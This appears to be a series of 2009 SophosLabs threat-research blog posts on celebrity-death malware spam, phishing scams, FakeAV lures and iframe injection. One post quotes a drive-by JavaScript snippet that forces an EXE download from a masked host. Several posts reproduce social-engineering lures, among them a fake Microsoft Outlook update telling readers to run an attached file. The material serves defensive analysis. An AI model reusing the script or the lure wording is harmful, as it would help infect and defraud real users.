Every year there are new products developed with the latest detection technologies. This year is no exception and Sophos is about to embark on a Beta program for its new products and we are looking for customers to join that program to help evaluate the latest offerings.

If you are interested in taking part them please check out http://www.sophos.com/products/beta/ and join in the program. I’m told there are Amazon vouchers available for those who provide feedback - I wonder if they’ll let me join.

This week, we’ve seen a rise in malware purporting to show images and video leading up to Michael’s death — many malware groups around the world appear to be getting in on the act.

MJ X-Files Mail Message

MJ X-Files Web Content

Anyone taking the standard precautions shouldn’t have difficulty avoiding this one — just make sure Javascript is disabled by default (so you don’t get infected by Mal/ObfJS-BP as found in the 1×1 iFrame — it tries to download and run the EXE via an old Acrobat Reader vulnerability), and don’t run the linked EXE manually (everyone knows that clicking on EXEs on a web page is a bad idea, right?) and get infected with Troj/ZBot-GJ.

While most of the malware is following this format, the Italians are getting a bit more creative:

MJ Italian Video Message

For those of you following along who don’t read Italian, my rough translation of the text is as follows:

The whole world was devastated when and Michael Jackson was found dead.
His death is surrounded with mystery; no one knows what happened, only that the mega star is dead.
But not just that. The following video clip shows Michael’s last moments and the cruel truth about his death.
Watch it and do not forget to leave a flower on Michael’s grave.
SHOCKING IMAGES! This video is not suited for children under the age of 16

This message contains a link to the following site:

The site, purporting to be an Italian YouTube site, throws up an error saying that you need to update your Flash player to view the video… with a download link to fake Codec malware Troj/ZBot-GK. It also contains the following Javascript code that I found very interesting:


<!--
function doDownload() {
/Genera il link al file zippato da scaricare
(tr. Generate the link to the zipped file to download)
location.href = “http://youtube****.com/Codec/120.exe”;
}

/Fa partire il download dopo 10 secondi da quando
/l’intermprete JavaScript ha rilevato la funzione
(tr. The download starts 10 seconds after the JavaScript interpreter has taken over the function)
window.setTimeout(”doDownload()”, 4000);
/–>

This associated code essentially forces the linked codec to download and possibly run after ten seconds of inactivity on the page. What I find interesting is that the script is well formatted and commented in Italian, and appears to be designed to force download a zip file. This implies that you can expect to see other Italian-targeted malware of this kind in the future.

You’re still safe as long as you keep Javascript disabled for untrusted websites and don’t download the EXE. But downloading the “update” can be a bit more tempting than the previous example.

Not to worry… Sophos blocks the e-mails, the websites, and the malware, so reading this blog is likely the closest you’ll come to this sordid display of opportunism.

We’ve been talking about the dangers of Facebook and Twitter for a couple of years now [1], [2], [3], [4], [5], [6].

This seems to be bringing back to the forefront the argument of locking down business networks to prevent access to these sites. Previous arguments have usually been limited to productivity drains, but as malware on these sites rise, security should be the overriding concern. The potential for information leaks from employees posting to these sites is increasing, as well as the possible damage from malware being sent from a corporation’s compromised network. And there’s still the whole cybersquatting issue, which also seems to be rising. There are companies that have been targeted with fake Facebook and Twitter profiles, which could potentially damage the company’s reputation.

With these considerations, should businesses lock down access to these sites at the risk of upsetting their employees?

I was reading my RSS reader when I came across this blog article from the WSJ: http://blogs.wsj.com/digits/2009/06/26/how-moms-feel-about-social-media/?mod=rss_WSJBlog and it really got me thinking. How many of these sites have been set up securely? How many of these moms are putting up their private details not thinking about the possible consequences of what happens if the site gets compromised?

Many of these sites are set up by women (and men) with the best of intentions.  They either have a bit of tech knowledge or they hire someone with the coding experience to set up the website. They make sure that they have some of the bells and whistles like private messaging, email lists, and message boards. The user interfaces are scrutinized to make sure they are user-friendly and easy to navigate. But how much attention is given to whether there are vulnerabilities in the server that is running the software? Who maintains the server and makes sure it’s patched and has AV on it? Is the software itself buggy and vulnerable to attack? Are they doing enough to protect their users?

Here’s a great example. I’m a member of several mom-centric social networks. One of which was in fact compromised. The servers had been compromised with an SQL injection attack. The hackers then trashed many of the templates for the site (fortunately they had decent backups and could restore the templates) and stole all the user information, including things like birthdays, usernames, passwords and email addresses. They sent a broadcast once control of the site was regained, but the damage was done. Every user had been compromised and their info was out in the world.

All except mine.

I never give correct personal details (such as birthdays) to websites.  While I appreciate that in general such information is collected for demographic stats, there really is no need for specific birthdays, mother’s maiden names, etc. More people should really think about what it is they put on the enrollment forms. With a name, address and birthdate, identities can be stolen.

Security here is two-fold. Not only should the site be secure, but the people using them should also be wary and on the lookout for links from people they may  or may not know, not giving out personal details and using secure passwords that are not the same as their email passwords or banking passwords.

Michael Jackson not only inspired millions of people through his music but his tireless charity work had given hope to millions more around the world. He is a true humanitarian and his ongoing contribution to society has established him as one of the most charitable celebrity in the world. The loss of Michael Jackson had devastated many people and left some feeling vulnerable because to many people Michael Jackson is more than a celebrity, he is their inspiration.

Unfortunately, there is a small minority in society that seems to have no sympathy at all and unscrupulously plans to benefit from such a tragedy.

Shortly after the death of Michael Jackson, scammers have started an online campaign to scam people into sending donations to the so called “MICHAEL JACKSON ORGANIZATION”.

Below is an example of the scam email that we received (which had already been blocked by Sophos appliances):

It is sad to see how some people can use the death of another person as a profiteering tool. Everyone should be careful not to fall prey to these scammers and always be on the look out for these common online scams.

Is the weather in Africa really that bad? Why is it always in Africa but not somewhere in China?

Here I will point out a few of the more interesting ones. There are the music, the meds, and the totally off-the-wall messages:

First up is a message that asks you to vote on “What killed Michael”:

In the message, a participant is supposed to get a free 7 album collection of Jackson’s songs for participating in the survey and “completing program requirements”. Just like the other “completing program requirements” spam messages, it’s likely there are hoops to jump through and purchases to engage in before there is any chance to receive the “free” items. Sadly, I am inclined to believe that there will be people out there who will try to participate in the survey to get the albums.

Next up is a spam message declaring that “Michael Jackson is not dead”:

This message has the hallmark of the image spam that have been so prevalent in recent days. In particular, the image of Michael Jackson has random, short, colored lines all over, often used to defeat antispam scanners. The curious will probably click on the image hoping to see evidence of Michael being alive. However, all that will do is take the surfer to a “Canadian Pharmacy” site selling the usual assortment of Viagra, Cialis and other pills. No evidence of Michael Jackson being alive. Sorry folks.

The last of the three messages is a “Rent your timeshare” spam:

So, what does this message have anything to do with Michael Jackson’s demise? The answer is in the source of the spam message:

The two circled text sections are Michael Jackson-related:

“Michael Jackson has hit the top of the pop singles chart”

“If any single song signaled that Michael Jacksons legacy as one of the top pop artists of all time would be secure, it was Billie Jean. The song remains a pop milestone and masterpiece. …”

As it is commonly known in the antispam circle, phrases from headline news and novels are regularly inserted into spam messages in order to defeat content and probability-based antispam scanners. Other than the hidden mention of Michael Jackson, this is just another one of typically-seen spam messages.

After digging through our spamtraps, there is still no evidence of large volume spam campaigns involving the deceased pop icon. It still remains to be seen how else would spammers and malware authors take advantage of this widespread and much-followed news.

Shortly after we detected the first spam message regarding Michael Jackson, the first malware related to his demise also arrived:

Michael Jackson malware spam

The body of the message is in Portuguese, which roughly translates into the following:

“The Los Angeles Times reported online that singer Michael Jackson died this Thursday (25th) at the age of 50. U.S. television networks CBS and ABC as well as the online versions of New York Times and Variety magazine are also reporting the death of the singer. Citing sources from Los Angeles firefighters, Jackson suffed from a cardiac arrest at his home, and was taken unconscious to the hospital.

Images of Michael Jackson’s body

Unpublished video not on-the-air yet.”

The image seems to be ripped from the entertainment biz show “Entertainment Tonight”, judging from the Orange “T” at the bottom left corner. The actual link, however, goes to a .com.au site which asks a user to download the file “Michael.Jackson.videos.scr”. This file is detected by Sophos Antivirus as Troj/Dloadr-CPD.

Interestingly, the youtube link at the very bottom is not hotlinked to any malware. If the link is pasted into a browser, it’ll take the audience to the music video of Michael Jackson’s hit “Thriller”.

Looking into our archives, we have not seen many samples of this malware spam and distribution seems limited so far. It is likely that more Michael Jackson-themed malware and spam is on its way however. It is advised that users be especially vigilant when they receive messages or links related to this news.

This is being sent out in email, with the subject: “Update your SOPHOS IDE scanner”.  Attached to the email is a .rar file - or rather, an EXE file pretending to be a rar file.  At this time, the filename was “SOPHOS IDE scanner.rar”.  Please don’t run it - it will attempt to install malware on your system.  Sophos updates should be obtained via the auto-update function of Sophos Anti-Virus, or by visiting http://www.sophos.com/downloads/ide/ - we never send identity data (IDEs) via email.

The body of the email looks like this:

“Download latest virus identity (IDE) files

If you are running an older version of Sophos Anti-Virus and do not automatically update your protection, you should download virus identity files (IDEs), which provide detection and disinfection of viruses, worms, Trojans and spyware.

All the IDEs you need are available in a single compressed file. NOTE: Please RUN the application accordingly.”

Note that this has been copied from the genuine Sophos download page and slightly altered, to give an air of authenticity.

It’s quite possible this is targetted at existing Sophos customers, but the payload will do bad things to anyone who runs it.  If you’re sent one of these emails, please let us know, as this is quite recent and we’re not sure how widespread it is yet.

Sophos customers with HIPS enabled were protected from this new threat even before we had seen it.  The malicious payload of the email is now detected as Troj/Spoof-H, published in spoof-h.ide.

Just after about 8 hours of his demise, SophosLabs witnessed the first wave of spam messages employing the sad news in the subject line and body part to harvest victims’ email addresses.

In this kind of spam message, the spammer claims she/he has vital information about the death of Michael Jackson to share with somebody, ie you.

The body of spam message does not contains any call-to-action link such as url, email, or phone number. And the from email address of the message is bogus.

But the spammer can harvest receivers’ email addresses via a free live email address if the spam message is replied to.

If you get this message you need just delete it! Please do not respond!

Take today’s hot topic for example. Well known actress Farah Fawcett passed away after a long battle with cancer.

Looking at the Google Trends data we can see that nearly a dozen of the top 100 searched terms today have involved the words “Farrah Fawcett”. What this translates to in the eyes of scammers is a better opportunity to have you click one of their sites which redirects you to their own FakeAV site in an attempt to get your money.

Doing a quick Google search for the words “Farrah Fawcett Dead” turns up the following link on the first page of results.

Visiting the link with a FireFox addon such as NoScript allows us to prevent the immediate redirection to the FakeAV site, and instead we’re greeted with a page that looks like this.

Anyone who tries making sense of the text will quickly realize that it’s a list of random dictionary words strung together to make it seem like it’s a real site. Of course, they never actually intend for you to see the page since there’s some script code that redirects you to the common FakeAV page seen all over the web. If you weren’t running an addon such as NoScript, you’d see the following page.

It’s important to keep in mind that whenever a hot news topic pops up, there are people out there trying to take advantage of the situation. Stick to known news sites you are familiar with and be sure to keep your anti-virus software up to date.

It appears the newly appointed Cyber Security minister of the UK, Lord West, has

… recruited a team of former hackers for its new Cyber Security Operations Centre.

<snip>

They had not employed any “ultra, ultra criminals” but needed the expertise of former “naughty boys,” he added.

This is precisely the type of misconception that gets all the cynics asking me if I actually write the malware our products defend against.

“You need youngsters who are deep into this stuff… If they have been slightly naughty boys, very often they really enjoy stopping other naughty boys,” he said.

Hrm… immature teenagers into writing slightly naughty malware. Yes, this is definitely who I want protecting my government’s “vital computer systems”.

No wonder skepticism lingers with the public about the AV industry.

With the coming of the end of the financial year (30th June), taxpayers working in Australia are preparing to lodge their income tax forms to the Australian Tax Office (ATO).  It comes as no surprise then, that today SophosLabs analysts intercepted an email phishing scam pretending to come from the ATO, targeting Australian taxpayers. Like many typical phishes, the body consists of plain text stating that the recipient has received a refund from the tax department and includes a link by which to obtain the funds (known in the ‘biz’ as the call-to-action). To increase the chances of the email being opened, a catchy subject line is employed.

When clicking the link in the phish, it opens a bogus Tax Office website which looks quite like the legitimate PDF form from the ATO. But the kicker is at the bottom of the form, with the unusual addition of a request for credit card and other personal details.

While many of us (actually just me) groan at the prospect of having to lodge our income tax forms, it definitely pays to be alert and wary of such scams, especially during tax time. This is even more so when one is lodging returns online. Do strenuously avoid clicking on URLs embedded in emails especially unsolicited emails.

SophosLab has since blocked the above phishing scam.

FYI the actual government website for the Australian Tax Office is http://www.ato.gov.au.

That kind of reminds me, I need to do my taxes….. drats.

What stood out about today’s sample (Protection System), was how easily it seems to have been created. Virus names are stolen, messages and detection info are hard-coded and even the website has the *same* virus names which are hard-coded into the malware. Here are some screenshots

Notice the Virus names in IDA. This is the same list of fake alerts that the malware displays upon “scanning” the computer.

Even the website has the same list of threats!!

Either the author was too lazy to include more malware names (and descriptions) in the malware, or this is one seriously limited AntiVirus solution. It can only protect the computer against a basic list of 10-12 threats ;-).

This malware is detected by Sophos as Troj/FakeAV-TU.

Take care

He was notorious for the “stock pump-n-dump” scam e-mails and was the #1 spammer on the SpamHaus’s “The 10 Worst Spammers” list as early as November 2005:

Today, one of the world’s first spam kings pleaded guilty “to charges of violating federal anti-spam laws by sending millions of emails in a stock-fraud scheme”.

It’s good to see anti-spam laws like the CAN-SPAM Act being put to use.

Enter SpenserNK - an Anti-USB-malware program which happens to operate by infecting removable devices, and keeping a library of its contents for matching at some later stage to determine whether an infection has occurred.

After copying itself to any removable media and creating an autorun.inf file to launch itself, SpenserNK quietly sits in the taskbar awaiting new USB devices to be inserted so that it can query the library for modifications (and to copy itself to it!)

But seriously! So called “good worms” or “good viruses” (e.g. Cruncher, the compression virus) are inherently a bad idea as discussed by Paul Ducklin [2,3] (the discussion in the podcast is at 20minutes in).

Needless to say, this anti-malware-malware is detected as W32/Spenser-A (and I’m hoping never to see a -B!)

ur cute, msg me on MSN

my MSN name is <censored>@live.com

ttys cutie :-*

It was sent from a botnet, contained varying e-mail addresses and had minor content randomization.

I’ve never used MSN Messenger before, but this was a good enough reason to get myself a special account:

Great! The contact established!

And the spam’s nature starting to make sense…

Indeed… We should trust each other…

Bingo!

The domain is registered anonymously in May 2009. Is hosted on CHINANET-YN. And belongs to a member of ClickCash.com affiliate network promoting adult-oriented websites. At least we’ve found out who is sponsoring the spam campaign, but lets keep talking:

Me: are you Sarah?

“Sarah”:  just put in your name and email address, and then it will take you to a page to get your free chat handle

Me: sweet. what country are you from?

“Sarah”: you have to fill out the user profile on the site to get your free registration and to prove you’re over 18 make sure you put real info because they verify it

Me:  it asks me for a credit card. you said it’s free to try

“Sarah”: alright baby you need 2 agree ur not a minor but baby u need to prove it with a cc/debit

Me: what if it’s a scam?

“Sarah”: The free package is what I use to access the site free and now u can too The free pass cancels everything out automatically. so ur all set to see me once u verify ur age babe

It’s getting strange now. Is she too busy to conduct a meaningful conversation?

Me: how many people do you have to chat with at the same time? :)

“Sarah”: CC is just to verify your age hun it doesnt charge your card i promise its the sites policy to ensure no minors get access to the site .. i gave u the free pass..

Well, I should have noticed it sooner…

I almost started to enjoy the conversation!  :)

I guess the next stage will be robots replacing real girls behind the web cams.

]]> http://www.sophos.com/blogs/sophoslabs//?feed=rss2&p=4927 http://www.sophos.com/blogs/sophoslabs//?p=4890 http://www.sophos.com/blogs/sophoslabs//?p=4890#comments Thu, 18 Jun 2009 11:09:37 +0000 Fraser Howard, SophosLabs UK http://www.sophos.com/blogs/sophoslabs//?p=4890 With the whole Gumblar incident still ringing in the ears [1,2], we have been monitoring a series of other mass injection attacks over recent weeks.

One such attack, dubbed ‘Nine-Ball’ [3], has gained some press this week. We have also been seeing malicious scripts we detect as Troj/Iframe-CB injected into large volumes of legitimate sites.

As the detection name suggests, the script serves the purpose of writing an iframe to the page to redirect to a remote site. Taking a look at the iframe the script adds, the authors make some interesting use of CSS properties to hide it. Rather than the normal tiny width/height and a display:none CSS attribute, they are now setting the opacity to 0. Presumably this is in an effort to evade detections that rely on the traditional hiding mechanisms.

Victims browsing affected pages are redirected through a series of remote sites, before being infected with a data stealing Trojan (detected as Troj/Mespam-B). The malicious PDF files being used to exploit client side vulnerabilities and deliver the Trojan, are detected as Troj/PDFJs-BG. Aside from ensuring you have effective protection technologies in place, you may also wish to consider application settings across your network [4].

Attempting to access one of the remote sites multiple times results in being redirected to the Ask.com search engine (makes a change from Google I guess).

This attack is just one of the mass injection attacks we have been seeing in recent weeks. Malware authors are clearly enjoying some success in hitting victims in this manner, so expect more of the same.

Update for Microsoft Outlook / Outlook Express (KB910721)

Brief Description
Microsoft has released an update for Microsoft Outlook / Outlook Express. This update is critical and provides you with the latest version of the Microsoft Outlook / Outlook Express and offers the highest levels of stability and security.

Instructions

* Install Update for Microsoft Outlook / Outlook Express (KB910721). To do this, follow these steps:
1. Run attached file officexp-KB910721-FullFile-ENU.exe
2. Restart Microsoft Outlook / Outlook Express

Quick Details

* File Name: officexp-KB910721-FullFile-ENU.exe
* Version: 1.4
* Date Published: Wed, 17 Jun 2009 17:03:27 +0300
* Language: English
* File Size: 81 KB

System Requirements

* Supported Operating Systems: Windows 2000; Windows 98; Windows ME; Windows NT; Windows Server 2003; Windows XP; Windows Vista

* This update applies to the following product: Microsoft Outlook / Outlook Express

It does look plausible, the spelling and grammar are surprisingly correct, for malware authors, but, as ever, one should always be cautious concerning e-mail attachments. Even those that purport to come from Microsoft and especially those that contain executables.

Sophos suggests that you go to the official Microsoft website to obtain your fixes since anyone who succumbed to this scam, far from enjoying ”the highest levels of stability and security“, will now be running a nasty little Trojan.  

Sophos detects this threat as Troj/Spy-CU.

The previous campaigns must have been successful as we are seeing a new spamming campaign, launched yesterday, which includes a link to a malicious file. Several URLs are used but the file name seems to consistenly be Outlook_update.exe.

Looking at the filename and the changes to the system when the file run in our automated analysis environment I would say this is a new Zbot variant, though in attempt to detect it as soon as possible we classified it yesterday as a generic backdoor Trojan.

Sophos products detect the file as Troj/Bckdr-QVN and all malicious URLs are blocked by Sophos Web Security appliance. The URLs used in this campaign seem to have been taken offline, but we can expect URLs to change as attackers setup additional hosts to serve malicious files.